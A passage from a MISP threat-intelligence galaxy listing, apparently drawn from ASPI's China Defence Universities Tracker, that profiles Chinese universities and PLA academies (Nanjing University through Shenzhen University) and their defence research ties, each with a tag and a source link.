NJU is subordinate to the MOE and has also been supervised by defence industry agency SASTIND since 2012. In 2016, the university was selected as a participant in the first batch of national dual-use demonstration bases, and a year later in 2017 was selected as a Class A world-class university. NJU is home to at least two defence laboratories and has committed to deepening its involvement in military-civilian fusion. As the first university in China to establish a State Secrecy Academy, in 2009, Nanjing University is involved in cyber security research.In 2018, NJU established an Institute of Artificial Intelligence and reported its research progress to the Jiangsu Provincial Committee of Military-Civilian Fusion when they visited the university. Following the visit, the provincial committee expressed interest in deepening cooperation on MCF projects in order to promote Jiangsu’s MCF work. The Institute of AI also co-built a research center with Intel, the Intel-Nanjing University Artificial Intelligence Research Center, which is Intel’s first research center focusing on AI in China. The university’s rapidly developing AI Institute provides an opportunity for deepening its involvement in MCF R&D. In May 2018, NJU signed a strategic cooperation agreement with Megvii 旷视科技. Megvii has been blacklisted by the US government over human rights abuses.

The tag is: misp-galaxy:china-defence-universities="Nanjing University (南京大学)"

Table 650. Table References
Links
https://unitracker.aspi.org.au/universities/nanjing-university

Nanjing University of Aeronautics and Astronautics (南京航空航天大学)

NUAA is one of the ‘Seven Sons of National Defence’ subordinate to the Ministry of Industry and Information Technology. NUAA specialises in aerospace research and works closely with the Chinese military as well as civilian and military aviation companies, including military aircraft manufacturers AVIC and AECC. 21% of the university’s graduates in 2018 who found employment were working in the defence sector.The university claims to have participated in nearly all major national aviation projects, including the development of the Chang’e 3 unmanned lunar explorer. NUAA hosts China’s only national defence laboratory for helicopter technology.NUAA has attracted controversy for its alleged involvement in the Ministry of State Security’s efforts to steal US aviation technology.

The tag is: misp-galaxy:china-defence-universities="Nanjing University of Aeronautics and Astronautics (南京航空航天大学)"

Table 651. Table References
Links
https://unitracker.aspi.org.au/universities/nanjing-university-of-aeronautics-and-astronautics

Nanjing University of Posts and Telecommunications (南京邮电大学)

NJUPT was initially ‘one of the earliest institutions devoted to training communications personnel for the Chinese Communist Party and red army’. Since then, NJUPT has evolved from a training college to a civilian university that offers undergraduate, post-graduate and doctoral degrees in various communications and engineering disciplines.NJUPT holds secret-level security credentials, allowing it to participate in classified defence research projects.Key areas of research include at the university:

The tag is: misp-galaxy:china-defence-universities="Nanjing University of Posts and Telecommunications (南京邮电大学)"

Table 652. Table References
Links
https://unitracker.aspi.org.au/universities/nanjing-university-of-posts-and-telecommunications

Nanjing University of Science and Technology (南京理工大学)

NJUST is one of the ‘Seven Sons of National Defence’ administered by the Ministry of Industry and Information Technology. Together with Beijing Institute of Technology, it was ranked as China’s top university for armaments science in 2017. Roughly 16% of the university’s graduates in 2018 who found employment were working in the defence sector.NJUST is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions specialising in weapons science—the ‘B’ in ‘B8’ stands for Chinese word for armaments, bingqi (兵器). Indicative of the university’s high level of involvement in defence research, in 2013 a disused laboratory on its campus exploded, killing one, after workers disturbed a cache of explosives.NJUST has a collaborative relationship with a PLA signals intelligence research institute, involving cooperation on unmanned combat platforms and information security.

The tag is: misp-galaxy:china-defence-universities="Nanjing University of Science and Technology (南京理工大学)"

Table 653. Table References
Links
https://unitracker.aspi.org.au/universities/nanjing-university-of-science-and-technology

National Defense University (中国人民解放军国防大学)

NDU is the PLA’s ‘premier’ institution for training in military theory, strategy, operations and political work, which can have its history traced back to the era of Mao Zedong’s peasant-led red army in 1927.The university is devoted to training the PLA’s officer corps in preparation for senior leadership positions. Given this focus on the softer skills of PLA administration, the National Defense University does not have as strong a focus on hard science as its counterpart, the National University of Defense Technology.

The tag is: misp-galaxy:china-defence-universities="National Defense University (中国人民解放军国防大学)"

Table 654. Table References
Links
https://unitracker.aspi.org.au/universities/national-defense-university

National University of Defense Technology (中国人民解放军国防科技大学)

In 2017, NUDT was reformed and placed in charge of the Institute of International Relations in Nanjing, the National Defense Information Institute in Wuhan, the Xi’an Communications College, the Electrical Engineering Institute in Hefei, and the College of Meteorology and Oceanography in Nanjing. The Institute of International Relations in Nanjing is a key training centre for intelligence officers.NUDT is known for its research on supercomputers, autonomous vehicles, hypersonic missiles and China’s Beidou Navigation Satellite System. The university developed the Tianhe-2A supercomputer at the National Supercomputing Center in Guangzhou, the world’s fastest supercomputer from 2013 to 2016. NUDT’s Tianhe-1A supercomputer is based at Hunan University’s National Supercomputing Center Changsha (国家超级计算长沙中心).For over a decade, NUDT has aggressively leveraged overseas expertise and resources to build its capabilities. The Australian Strategic Policy Institute’s International Cyber Policy Centre’s October 2018 report ‘Picking flowers, making honey: The Chinese military’s collaboration with foreign universities’ documented and analysed NUDT’s overseas presence. The report found that by 2013 the university had sent over 1,600 of its professors and students to study and work abroad. Universities in the United States, the United Kingdom, Australia, Canada, Singapore, the Netherlands and Germany engage in some of the highest levels of collaboration with NUDT. Some of NUDT’s leading experts on drone swarms, hypersonic missiles, supercomputers, radars, navigation and quantum physics have been sent to study or work abroad.Defected Chinese spy Wang Liqiang claimed in 2019 that NUDT’s ‘Intelligence Center’ sent him fake passports for his mission to interfere in Taiwanese politics. This indicates that the university plays an important role in supporting China’s overseas intelligence activity.NUDT also works with foreign technology companies. Google and Microsoft have both worked with and trained NUDT scientists.

The tag is: misp-galaxy:china-defence-universities="National University of Defense Technology (中国人民解放军国防科技大学)"

Table 655. Table References
Links
https://unitracker.aspi.org.au/universities/national-university-of-defense-technology

Naval Command College (中国人民解放军海军指挥学院)

The Naval Command College is an institution that provides education and training for naval officers in a variety of disciplines such as military thought, strategic studies, intelligence training and political work along with military operations, tactics and campaigns. The college plays a crucial role in improving the quality of PLA Navy personnel, as well as providing combined arms training for mid-career political commissars, logistics officers and equipment officers. The college serves to improve strategic and tactical thinking in the PLA Navy by hosting the Naval Campaigns and Tactics Center Laboratory (海军战役战术中心实验室) and producing research that looks at operationalising new training and command systems. It is the PLA-N’s last remaining command academic institution.

The tag is: misp-galaxy:china-defence-universities="Naval Command College (中国人民解放军海军指挥学院)"

Table 656. Table References
Links
https://unitracker.aspi.org.au/universities/naval-command-college

Naval Petty Officer Academy (中国人民解放军海军士官学校)

The academy has three main departments focused on training, campus affairs and political work. It has published research on radar jamming.

The tag is: misp-galaxy:china-defence-universities="Naval Petty Officer Academy (中国人民解放军海军士官学校)"

Table 657. Table References
Links
https://unitracker.aspi.org.au/universities/naval-petty-officer-academy

Naval Research Academy (中国人民解放军海军研究院)

The Naval Research Academy was established in July 2017 following Xi Jinping’s military reforms. Main areas of study include military theory and technological research as well as the maritime environment and national defence engineering.The Naval Research Academy actively collaborates with civilian universities as part of China’s military-civil fusion program. In April 2019, delegates from the Naval Research Academy attended a meeting with officials from Xi’an Jiaotong University on co-operation directed at improving the quality assurance and technological reliability of complex armaments currently in service in the PLA Navy. Major General Li Wei from the Naval Research Academy stated that his colleagues were paying ‘very close attention to this co-operation with Xi’an Jiaotong University’ in the development and sustainment of naval equipment.The Naval Research Academy also collaborates with civilian research institutes. For example, the Institute for Industrial Military-Civil Fusion at the Research Institute of Machinery Industry Economic and Management claims to have worked with the Naval Research Academy and a number of state-owned enterprises that focus on defence technology such as China Shipbuilding Industry Corporation (CSIC) in order to develop strategies for military-civil fusion.The Naval Research Academy’s involvement in military-civil fusion is particularly notable for work on maritime information technology and equipment. In January 2019, delegates from the Naval Research Academy attended a conference hosted by the National Key Laboratory of Underwater Acoustic Science and Technology (水声技术国防科技重点实验室) and the Key Laboratory of Marine Information Acquisition and Security Industry and Information Technology (海洋信息获取与安全工业和信息化部重点实验室) of Harbin Engineering University (HEU). The Naval Research Academy’s Liu Qingyu (刘清宇) was reported to have made a presentation on international and domestic developments in marine sonar technology at the conference.Liu Qingyu from the Naval Research Academy has a particularly strong record of engagement with civilian and military institutions for his research into marine sonar technology. In 2018, Liu delivered a presentation to the Northwestern Polytechnical University (NPU) which ‘elaborated on some of the problems facing the national costal defence industry’ and ‘suggested areas for future research into marine acoustics.’ Both students and academics from NPU attended Liu’s presentation. Liu has also published papers on acoustic science with scholars from the Chinese Academy of Sciences, the Naval University of Engineering, and Northwestern Polytechnical University.

The tag is: misp-galaxy:china-defence-universities="Naval Research Academy (中国人民解放军海军研究院)"

Table 658. Table References
Links
https://unitracker.aspi.org.au/universities/naval-research-academy

Naval University of Engineering (中国人民解放军海军工程大学)

NUE is one of the PLA’s five comprehensive universities, which trains students in a variety of engineering and core military disciplines related to naval warfare.The university is home two national laboratories. The National Key Laboratory for Vessel Integrated Power System Technology (舰船综合电力技术国防科技重点实验室), which was established in 2010 to carry out ‘indigenous research and development’ into integrated electric propulsion (IEP) systems that power naval vessels at sea. IEP generally uses diesel generators and/or gas turbines to generate the electricity needed in order to turn propellers on large surface vessels such as guided missile destroyers or amphibious assault ships. The lab is jointly run by NUE and China Shipbuilding Industry Corporation’s (CSIC) 712th Research Institute.Rear Admiral Ma Weiming has led the National Key Laboratory for Vessel Integrated Power System Technology to develop propulsion systems for aircraft catapults, electromagnetic weapons and satellite launches. Admiral Ma has been referred to as ‘the father of China’s electromagnetic catapult system’ (中国电磁弹射之父) by official Chinese media sources.NUE’s National Defense Technology Key Laboratory of Marine Vibration and Noise (船舶振动噪声国防科技重点实验室) works on acoustic quieting technology for submarines. The lab is probably jointly run with CSIC’s 701st Research Institute, also known as China Ship Development and Design Center (中国舰船研究设计中心).Another laboratory that conducts defence research at NUE is the Nuclear Marine Propulsion Engineering Military Key Laboratory (舰船核动力工程军队重点实验室). The lab focuses on researching and training engineers in nuclear engineering for warships and submarines.Academic departments at the Naval University of Engineering include:

The tag is: misp-galaxy:china-defence-universities="Naval University of Engineering (中国人民解放军海军工程大学)"

Table 659. Table References
Links
https://unitracker.aspi.org.au/universities/naval-university-of-engineering

Navy Aviation University (中国人民解放军海军航空大学)

The Navy Aviation University was established upon the merger of the Naval Aviation Pilot Academy and the Naval Aviation Engineering University during Xi Jinping’s military reforms in 2017. The university conducts research into missile engineering, electrical engineering and automation, navigation engineering as well as air station management engineering and flight vehicle design engineering. Academic articles published by the university have looked at topics such as the PLA-N’s combat system capability and naval aviation management systems.

The tag is: misp-galaxy:china-defence-universities="Navy Aviation University (中国人民解放军海军航空大学)"

Table 660. Table References
Links
https://unitracker.aspi.org.au/universities/navy-aviation-university

Navy Logistics Academy (中国人民解放军海军勤务学院)

The Navy Logistics Academy is an institution devoted to training naval cadets and officers specialising in logistics. The academy’s core training and research focuses on military studies, management science and economics, while specialist lines of research include logistics command management and military financial auditing. The Center for Naval Analyses (CNA) in Arlington, Virginia have noted that entry into the academy tends to occur at the mid-career level for officers in the PLA-N.

The tag is: misp-galaxy:china-defence-universities="Navy Logistics Academy (中国人民解放军海军勤务学院)"

Table 661. Table References
Links
https://unitracker.aspi.org.au/universities/navy-logistics-academy

Navy Medical University (中国人民解放军海军军医大学)

The PLA Navy Medical University, formerly known as the Second Military Medical University, was established in 1951 as a university focussed on medical research for the Chinese military.

The tag is: misp-galaxy:china-defence-universities="Navy Medical University (中国人民解放军海军军医大学)"

Table 662. Table References
Links
https://unitracker.aspi.org.au/universities/navy-medical-university

Navy Submarine Academy (中国人民解放军海军潜艇学院)

The Navy Submarine Academy is responsible for the training of submariners to crew its conventionally and nuclear-powered submarines. The academy focuses its research on subjects such as electrical and information engineering, combat simulation, underwater acoustic engineering and navigation technology along with weapons systems and launch engineering and underwater ordnance technology. The academy also offers programs in combat tactics and the underwater combat environment.The Navy Submarine Academy pursues research that may contribute to Chinese anti-submarine warfare capabilities through the Underwater Operational Environment Military Key Laboratory (水下作战环境军队重点实验室). The academy also oversees part of the The publication record of researchers from the Navy Submarine Academy also suggests a strong interest in foreign developments in undersea warfare systems. In 2018, the Navy Submarine Academy signed a cooperative agreement with Harbin Engineering University (HEU). The agreement is directed at promoting research collaboration in subjects such as big data fusion, intelligent navigation, underwater acoustic target recognition, and underwater unmanned intelligent control systems.

The tag is: misp-galaxy:china-defence-universities="Navy Submarine Academy (中国人民解放军海军潜艇学院)"

Table 663. Table References
Links
https://unitracker.aspi.org.au/universities/navy-submarine-academy

North China Institute of Aerospace Engineering (北华航天工业学院)

NCIAE specialises aerospace technology and engineering. The university is primarily run by the Hebei Provincial Government, together with the State Administration of Science, Technology and Industry for National Defense, China Aerospace Science and Technology Corporation (CASC), and China Aerospace Science and Industry Corporation (CASIC).NCIAE appears to be a major training center for CASC and CASIC, state-owned defence conglomerates that dominate China’s missile and satellite sector. NCIAE runs at least two research and development centres with CASC and was involved in the development of the Shenzhou spacecraft, Long March rockets and the DFH-5 satellite platform.In 2003, the Hebei Provincial Government, CASC and CASIC signed an agreement to jointly support NCIAE (pictured below, courtesy of NCIAE).

The tag is: misp-galaxy:china-defence-universities="North China Institute of Aerospace Engineering (北华航天工业学院)"

Table 664. Table References
Links
https://unitracker.aspi.org.au/universities/north-china-institute-of-aerospace-engineering

North China University of Science and Technology (华北理工大学)

NCST was founded in 2010 and focuses on metallurgy and materials science. The university engages in growing levels of defence research since coming under the supervision of defence industry agency SASTIND in 2013.‘Military-use critical materials’ has been designated as a key defence research area at NCST.

The tag is: misp-galaxy:china-defence-universities="North China University of Science and Technology (华北理工大学)"

Table 665. Table References
Links
https://unitracker.aspi.org.au/universities/north-china-university-of-science-and-technology

North University of China (中北大学)

NUC is a civilian university that specailises in defence research. It is jointly administered by the Shanxi Provincial Government and defence industry agency SASTIND. The university traces its roots back to an ordnance school established by the Eighth Route Army in 1941, and defence research is central to its identity. According to NUC’s website, ‘Our university has long established excellent and cooperative relationships with Central Military Commission departments, SASTIND, Norinco Group, China South Industries Group, China Aerospace Science and Technology Group, China Aerospace Science and Industry Group, and our graduates are spread across different areas in defence industry.’ Approximately 2000 of its graduates enter the defence industry each year.NUC specialises in testing and developing weapons, including tanks, missiles and explosives. Its Underground Target Damage Technology National Defense Key Subject Laboratory reportedly runs the only underground shooting range in a Chinese university. The university is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in armament science—the ‘B’ in ‘B8’ stands for Chinese work for armaments, bingqi (兵器).

The tag is: misp-galaxy:china-defence-universities="North University of China (中北大学)"

Table 666. Table References
Links
https://unitracker.aspi.org.au/universities/north-university-of-china

Northeastern University (东北大学)

NEU is a major civilian university subordinate to the Ministry of Education. The university hosts three national laboratories, all of which are related to industrial manufacturing technology.NEU engages in growing levels of defence research. It holds secret-level security credentials allowing it to participate in classified weapons projects and hosts the defence-focused Key Laboratory of Aerodynamic Equipment Vibration and Control. In 2018, NEU was approved to build a further five laboratories that could be involved in future defence or security-related research.In 2019, NEU joined the Shenyang Aircraft Design Institute Collaborative Innovation Alliance (沈阳飞机设计研究所协同创新联盟), a group of universities and institutes, led by defence conglomerate AVIC, that are involved in the development of military aircraft. NEU also runs a National Defense Science and Technology Development Research Institute (国防科技发展研究院). In 2019, the institute’s senior deputy director was awarded a China Industry-University-Research Cooperation Military-Civil Fusion Prize.

The tag is: misp-galaxy:china-defence-universities="Northeastern University (东北大学)"

Table 667. Table References
Links
https://unitracker.aspi.org.au/universities/northeastern-university

Northwest Institute of Nuclear Technology (西北核技术研究所)

NINT is one of China’s main sites of nuclear technology research. While the Chinese Academy of Engineering Physics is believed to be China’s only manufacturer of nuclear warheads, NINT likely plays a supporting role in research for nuclear weapons. It is especially active in research on lasers, which can be used in nuclear fusion reactors or weapons. Aside from nuclear technology, NINT carries out research on topics including electronics, information science, materials science, control science and chemistry.NINT has partnerships with several institutes in the Chinese Academy of Sciences, Xiangtan University, Northwestern Polytechnical University, and Xi’an Jiaotong University.

The tag is: misp-galaxy:china-defence-universities="Northwest Institute of Nuclear Technology (西北核技术研究所)"

Table 668. Table References
Links
https://unitracker.aspi.org.au/universities/northwest-institute-of-nuclear-technology

Northwestern Polytechnical University (西北工业大学)

The university is one of the ‘Seven Sons of National Defence’ subordinate to MIIT. It is heavily engaged in military research, describing itself as ‘devoted to improving and serving the national defence science and technology industry.’ NWPU’s research focuses on aviation, space and naval technology. Between 2014 and 2018, the university’s School of Mechanics, Civil Engineering and Architecture alone spent nearly RMB200 million (AUD40 million) on defence research projects. 41.25% of 2017 NWPU graduates who gained employment were working in the defence sector.NWPU is known for its development of unmanned aerial vehicles (UAVs). The only Chinese university hosting a UAV defence laboratory, NWPU produces the ASN series of UAVs though its subsidiary company, Aisheng Technology Group Co., Ltd. The Chinese military is the company’s largest customer and the company once claimed to produce 90% of China’s drones.The university has close ties to state-owned shipbuilding and aerospace conglomerates.

The tag is: misp-galaxy:china-defence-universities="Northwestern Polytechnical University (西北工业大学)"

Table 669. Table References
Links
https://unitracker.aspi.org.au/universities/northwestern-polytechnical-university

Officers College of the PAP (中国人民武装警察部队警官学院)

The Officers College of the PAP was established as an institution devoted to training officers of China’s paramilitary service in command and engineering disciplines. The college’s research focusses on combat command, command information systems engineering, philosophy, law, political education, Chinese language and literature, history, mathematics, physics, applied psychology, electrical science and technology, computer science and technology, and management science and engineering.The Officers College of the PAP is especially active in developing drone technology. On 26 June 2019, the college tested its X-Swift unmanned aerial vehicles (UAV) for a test surveillance and reconnaissance flight with special operations personnel in Sichuan.The college is also active in developing applications for drone technology. Researchers from the college have collaborated with personnel from the PLA Logistics Engineering University to publish an article in favour of deploying UAVs to southern Xinjiang for counter-terrorism missions. The researchers argue for UAVs to be deployed for regional surveillance and strike as well as search and seizure missions in Xinjiang, drawing off lessons from the US coalition against ISIS.

The tag is: misp-galaxy:china-defence-universities="Officers College of the PAP (中国人民武装警察部队警官学院)"

Table 670. Table References
Links
https://unitracker.aspi.org.au/universities/officers-college-of-the-pap

PAP NCO College (中国人民武装警察部队士官学校)

The PAP NCO College was established in 2017 following Xi Jinping’s reforms to China’s military education system. The college does not appear to engage in significant levels of defence research and focuses its attention on training enlisted personnel in China’s paramilitary service, the People’s Armed Police.

The tag is: misp-galaxy:china-defence-universities="PAP NCO College (中国人民武装警察部队士官学校)"

Table 671. Table References
Links
https://unitracker.aspi.org.au/universities/pap-nco-college

Peking University (北京大学)

PKU is considered among China’s most prestigious universities with a storied history. It is ranked as one of China’s top two academic institutions, along with Tsinghua University. Unsurprisingly, the university has been included in a number of the PRC’s educational initiatives, including as a Class A institution under the Double First-Class University program.PKU has been subject to at least two joint-supervision agreements between the Ministry of Education and defence industry agency SASTIND. These agreements, signed in 2012 and 2016, are designed to deepen the university’s involvement in defence research.PKU’s Advanced Technology Institute was founded in 2006 to oversee and develop the university’s defence research. Includes several research centres and supervises the university’s four major defence laboratories. The institute’s research covers semiconductors, nuclear technology, quantum physics, advanced materials, underwater acoustics, satellite navigation and communications, flight propulsion, aerospace engineering and microprocessors.In 2017, PKU and the Chinese Academy of Engineering Physics (CAEP)—China’s nuclear weapons program—established the PKU–CAEP New Structure Center for Applied Physics and Technology (北京大学-中国工程物理研究院新体制应用物理与技术研究中心).. The institution was founded on the basis of the PKU Center for Applied Physics and Technology (北京大学应用物理与技术研究中心) established with CAEP in 2007. The joint centre carries out research on materials, lasers for atomic physics applications, laser plasma physics, computer science and fluid dynamics. PKU’s report on the centre notes that it will serve China’s national defence needs and that CAEP’s deputy director emphasised it should ‘take the path of military-civil fusion’. The joint centre’s honorary director and founding director, He Xiantu, is credited as the developer of China’s first neutron bomb.PKU takes precautions for the protection of classified information. The university has an office devoted to the secure handling of classified information, hosting regular meetings and training sessions to strengthen the university’s security culture. In 2006, the university received security credentials for participation in classified defence research.

The tag is: misp-galaxy:china-defence-universities="Peking University (北京大学)"

Table 672. Table References
Links
https://unitracker.aspi.org.au/universities/peking-university

People’s Armed Police Command College (中国人民武装警察指挥学院)

The PAP Command College is an institution devoted to training officers in China’s paramilitary service, the People’s Armed Police, that was established in 1984. The college’s key subjects focus on law, engineering, military studies and management studies, but most attention is devoted to paramilitary training and political work. The PAP Command College maintains a focus on paramilitary training, but it does retain a scientific research program.Drone technology is another area of interest for the PAP Command College. The college was involved in testing the X-Swift unmanned aerial vehicle (UAV) in June 2019. Kang Jian from the college’s Scientific Research Department also attended the 2017 Drone World Congress hosted in Shenzhen.

The tag is: misp-galaxy:china-defence-universities="People’s Armed Police Command College (中国人民武装警察指挥学院)"

Table 673. Table References
Links
https://unitracker.aspi.org.au/universities/peoples-armed-police-command-college

People’s Public Security University of China (中国人民公安大学)

PPSUC was founded in July 1948. In 1984, it was developed into a full-time higher education institution with master’s and bachelor’s degree programs. In 1998, it was merged with the Chinese People’s Police University (中国人民警官大学). Its schools include a Marxism School, Law School, Law and Order School, Investigation and Anti-Terrorism School, Criminology School, Pubic Security Management School, International Policing and Law Enforcement School, Police Training College (which covers combat training and command and tactical training), Criminal Science and Technology School, Information Technology and Network Security School, and a Traffic Management School.PPSUC is involved in the development of technological tools for public security applications, including image recognition. For instance, the university signed an agreement with Chinese video surveillance equipment manufacturer Hikvision in 2016 to set up a joint laboratory on video image recognition technology. In 2018, it signed a strategic cooperation agreement with Xiamen Meiya Pico Information Co., a Chinese company that provides digital forensics and information security products, which included upgrading a forensics laboratory and establishing a cyber security attack and defence laboratory.The university also has cooperation agreements with numerous local government-level public security bureaus across the PRC. These include agreements on image recognition technology for local public security bureaus and joint laboratories. For instance, in 2018 alongside the Nanshan sub-bureau of Shenzhen Public Security Bureau and the artificial intelligence companies SenseTime and Shenzhen Yuantian Lifei, it signed a strategic cooperation agreement on applying video recognition and the establishment of a joint laboratory.

The tag is: misp-galaxy:china-defence-universities="People’s Public Security University of China (中国人民公安大学)"

Table 674. Table References
Links
https://unitracker.aspi.org.au/universities/peoples-public-security-university-of-china

Railway Police College (铁道警察学院)

The Railway Police College is China’s only institution of higher learning devoted to training specialists responsible for securing the Chinese railway network. In 2017, the college graduated over 1,000 personnel trained in disciplines such as surveillance studies, political security studies and safety management studies.

The tag is: misp-galaxy:china-defence-universities="Railway Police College (铁道警察学院)"

Table 675. Table References
Links
https://unitracker.aspi.org.au/universities/railway-police-college

Renmin University (人民大学)

Renmin University is subordinate to the Ministry of Education and also supported by the Beijing Municipal Government. Its focus is in the humanities and social sciences. Although the university does not appear to have ties with the national defense industry, it was placed on the US Government’s Unverified List in April 2019, which places restrictions on US exports to the university. Entities are added the Unverified List if the US Government is unable to satisfactorily carry out end-user checks on them to ensure compliance with export licenses.

The tag is: misp-galaxy:china-defence-universities="Renmin University (人民大学)"

Table 676. Table References
Links
https://unitracker.aspi.org.au/universities/renmin-university

Rocket Force Command College (中国人民解放军火箭指挥学院)

The Rocket Force Command College is the PLA’s premier institute devoted to training cadets and early-to-mid career officers in conventional and nuclear missile campaigns. Candidates require understanding of battlefield command, management and campaign tactics prior to entry into the college. The college then builds on this knowledge by providing specialist training for missile campaigns.

The tag is: misp-galaxy:china-defence-universities="Rocket Force Command College (中国人民解放军火箭指挥学院)"

Table 677. Table References
Links
https://unitracker.aspi.org.au/universities/rocket-force-command-college

Rocket Force Research Institute (中国人民解放军火箭军研究院)

The Rocket Force Research Institute develops nuclear and conventional ballistic missiles, carrying out research on warhead, guidance and control technology. It appears to be the successor to the PLA Second Artillery Equipment Academy (火箭军装备研究院) and the Rocket Force Equipment Academy (火箭军装备研究院). The institute reportedly hosts two national-level defence laboratories. It also has a strategic cooperation agreement with Beijing Institute of Technology, which hosts two state key laboratories that study impacts and explosions.

The tag is: misp-galaxy:china-defence-universities="Rocket Force Research Institute (中国人民解放军火箭军研究院)"

Table 678. Table References
Links
https://unitracker.aspi.org.au/universities/rocket-force-research-institute

Rocket Force Sergeant School (中国人民解放军火箭军士官学校)

The Rocket Force Officer College is an institution devoted to training military personnel for China’s tactical and strategic missile forces that was established after Xi Jinping’s military reforms in 2017. The college’s focus is on providing technical training to personnel in the PLARF’s missile systems. However, the college has also produced research on underground engineering which would be useful to hardening bases for missile strikes.

The tag is: misp-galaxy:china-defence-universities="Rocket Force Sergeant School (中国人民解放军火箭军士官学校)"

Table 679. Table References
Links
https://unitracker.aspi.org.au/universities/rocket-force-sergeant-school

Rocket Force University of Engineering (中国人民解放军火箭军工程大学)

RFUE is the PLA strategic missile force’s leading institution for training technical and scientific talent. Students entering the university tend to be university graduates and career members of the PLA Rocket Force.Defence research conducted by the RFUE focuses on building resilience and capabilities for conventional and nuclear missile strikes. RFUE hosts the Missile Testing and Control Virtual Simulation Experimental Teaching Center (导弹测试与控制虚拟仿真实验教学中心).The university’s key areas of research include:

The tag is: misp-galaxy:china-defence-universities="Rocket Force University of Engineering (中国人民解放军火箭军工程大学)"

Table 680. Table References
Links
https://unitracker.aspi.org.au/universities/rocket-force-university-of-engineering

Shandong University (山东大学)

SDU is subordinate to the Ministry of Education. Since 2016, it has also been supervised by defence industry agency SASTIND as part of a program to expand universities’ involvement in defence research and training.SDU has pursued greater involvement in defence research since at least 2006, when it established a national defence research institute to coordinate relevant work across the university. Shortly afterwards, it received secret-level security credentials allowing it to participate and research and production for classified weapons and defence technology projects. In 2008, it was recognised as one of Shandong Province’s 10 outstanding defence industry units.SDU collaborates with the Chinese Academy of Engineering Physics, China’s nuclear warheads development facility, on topics including the development of crystals that are used in the study of nuclear explosions and research on fusion ignition.

The tag is: misp-galaxy:china-defence-universities="Shandong University (山东大学)"

Table 681. Table References
Links
https://unitracker.aspi.org.au/universities/shandong-university

Shandong University of Technology (山东理工大学)

SDUT specialises in engineering and carries out growing levels of defence research. In 2018, SDUT became the only university in Shandong Province jointly supervised by defence industry agency SASTIND besides Shandong University. This indicates that SDUT’s involvement in defence research and links to the defence industry will grow in coming years.SASTIND has specifically indicated its intention to build up advanced materials and advanced manufacturing technology as areas of defence research at SDUT. SDUT has carried out research on mechatronic engineering for the defence industry, and developed a non-destructive testing system for ceramic antenna covers on missiles.

The tag is: misp-galaxy:china-defence-universities="Shandong University of Technology (山东理工大学)"

Table 682. Table References
Links
https://unitracker.aspi.org.au/universities/shandong-university-of-technology

Shanghai Jiao Tong University (上海交通大学)

SJTU is directly under the administration of the MOE. In 2016 it also came under the supervision of defence industry agency SASTIND as part of a ‘joint construction’ agreement between the MOE and SASTIND.The university has at least three laboratories focused on defense research relating to materials science, ships and hydrodynamics. The defence labs have established substantial collaborative research and talent development relationships with hydrodynamics research groups at universities including MIT, Cornell, and the Danish Technical University.One of the university’s strongest departments is computer science. Its computer science program has garnered support from American tech companies such as Cisco Systems and Microsoft, which collaborated on establishing a laboratory for intelligent computing and intelligent systems at the university. In particular, the School of Information Security Engineering, has ties to the PLA through its dean and chief professor who both previously worked for the PLA. SJTU also has ties to the PLA Unit 61398, a cyber espionage unit that has been implicated in cyber attacks on the United States.SJTU is also known for its involvement in maritime research. The School of Naval Architecture, Ocean & Civil Engineering cooperates extensively with other universities from around the world as well as with many domestic industrial enterprises, such as defence conglomerate CSIC and CASC. The school is the lead unit of the High-tech Ship and Deep-Sea Development Equipment Collaborative Innovation Center (高新船舶与深海开发装备协同创新中心), where it has contributed to assisting the PLA Navy’s transition to offshore defense operations.

The tag is: misp-galaxy:china-defence-universities="Shanghai Jiao Tong University (上海交通大学)"

Table 683. Table References
Links
https://unitracker.aspi.org.au/universities/shanghai-jiaotong-university

Shanghai University (上海大学)

SHU is engaged in growing levels of defence research. In 2016, the Shanghai Municipal Government and defence industry agency SASTIND agreed to jointly supervise and support its participation in defence research.Shanghai University has begun building up its capability in defence research in areas such as unmanned surface vehicles, materials for missiles, and microwave technology. It holds secret-level security credentials, allowing it to participate in classified defence technology projects.Shanghai University’s Research Institute of Unmanned Surface Vehicle Engineering researches and produces unmanned surface vessels, some of which are for the China Maritime Safety Administration.

The tag is: misp-galaxy:china-defence-universities="Shanghai University (上海大学)"

Table 684. Table References
Links
https://unitracker.aspi.org.au/universities/shanghai-university

Shenyang Aerospace University (沈阳航空航天大学)

SAU is the only university formally under the supervision of China’s military aircraft manufacturer, AVIC. SAU engages in high levels of defence research and describes itself as a base for training talent in national defence science and technology. Serving China’s military aviation industry is what SAU refers to as its ‘glorious tradition’.Many of China’s military aircraft are designed and built in Shenyang, which is home to AVIC subsidiaries Shenyang Aircraft Design Institute and Shenyang Aircraft Corporation. SAU and AVIC work closely together, including through a joint research institute.

The tag is: misp-galaxy:china-defence-universities="Shenyang Aerospace University (沈阳航空航天大学)"

Table 685. Table References
Links
https://unitracker.aspi.org.au/universities/shenyang-aerospace-university

Shenyang Ligong University (沈阳理工大学)

SYLU is a civilian university that specialises in defence research. The university’s primary areas of defence research are armament science, information and communications engineering, control science, materials science and mechanical engineering. Apart from Xi’an Technological University, SYLU is the only Chinese civilian university supervised by state-owned arms manufacturers Norinco Group and China South Industries Group. In 2016, it also came under the supervision of defence industry agency SASTIND.SYLU is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in armament science—the ‘B’ in ‘B8’ stands for the Chinese word for armaments, bingqi (兵器). The university runs a weapons museum on its campus. Furthermore, SYLU is a member of the Liaoning Military-Civil Fusion Arms Industry-College Alliance (辽宁军民融合（兵工）产业校企联盟) and SYLU’s president doubles as chairman of the alliance. This indicates close ties between SYLU and China’s arms industry.

The tag is: misp-galaxy:china-defence-universities="Shenyang Ligong University (沈阳理工大学)"

Table 686. Table References
Links
https://unitracker.aspi.org.au/universities/shenyang-ligong-university

Shenzhen University (深圳大学)

SZU is the primary university in China’s rapidly growing technology hub, Shenzhen. The university does not appear to engage in high levels of defence research outside of its national defence laboratory on automatic target recognition. The laboratory was founded in 2001, is overseen by the PLA and SASTIND, and is headed by the university’s former president.

The tag is: misp-galaxy:china-defence-universities="Shenzhen University (深圳大学)"

Table 687. Table References
Links
https://unitracker.aspi.org.au/universities/shenzhen-university

Shijiazhuang Tiedao University (石家庄铁道大学)

